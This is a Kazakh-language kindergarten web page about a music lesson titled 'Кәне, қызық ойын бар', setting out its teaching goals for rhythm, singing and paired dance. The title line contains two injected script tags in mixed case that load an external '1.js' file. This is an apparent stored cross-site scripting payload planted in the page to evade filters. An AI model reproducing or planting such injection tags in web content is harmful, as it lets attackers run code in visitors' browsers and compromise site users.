«Кәне,қызық ойын бар»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.04.2021

                 

                 «Кәне,қызық ойын бар»

   Балабақшадағы сәбилік шағынан тәрбиеленіп келе жатқан балада музыканы тыңдау ,оны түсіну,есте сақтау,ажырата білу,ән салу,би билеу,сазгерлерді, аспаптарды тану қабілеттері бірте-бірте қалыптасады. Баланың музыка әлемімен танысуы,оның сезінуі және қалыптасуы сәби кезінен басталады. Бала әуенді тыңдауға,оны түсінуге,есте сақтауға үйренеді.

   Музыкалық оқу қызметінде музыкалық-дидактикалық ойындарды жүйелі түрде пайдалану – музыканы сипатына, көңіл-күйіне,динамикалық ренкіне қарай ажыратуды үйретеді.Балаларды әр түрлі музыкалық шараларға тек жеке өзін қатыстырмай ,үлкендермен ,ата-аналармен бірге қатыстырудың мәні зор.

   Музыкалық-ырғақты қимылдарды орындауда,би билеуде музыкалық аспаптарды қолдану музыканың ырғағын , динамикалық үнін, екпінін ажыратуға үйретіп,орындаушылық шеберліктерін шыңдайды.

Ортаңғы  « Тәй-Тәй» тобында музыка  оқу қызметінде «Кәне,қызық ойын бар» тақырыбында  өтті.

Мақсаты :

 Музыкалық шығарманың эмоциямен қабылдауға дағдыландыру; шығарманың көңілді сипатына сәйкес сүйемелдеумен және сүйемелдеусіз ән салуға үйрету;музыка ырғағына сай жұптаса отырып би қимылдарын орындауға баулу,көңіл күй,шаттық сезімін ояту.

 

 

 

                 

Просмотров: 341


Пікір қосу



Деректерді қолтаңбаға қосу
Текст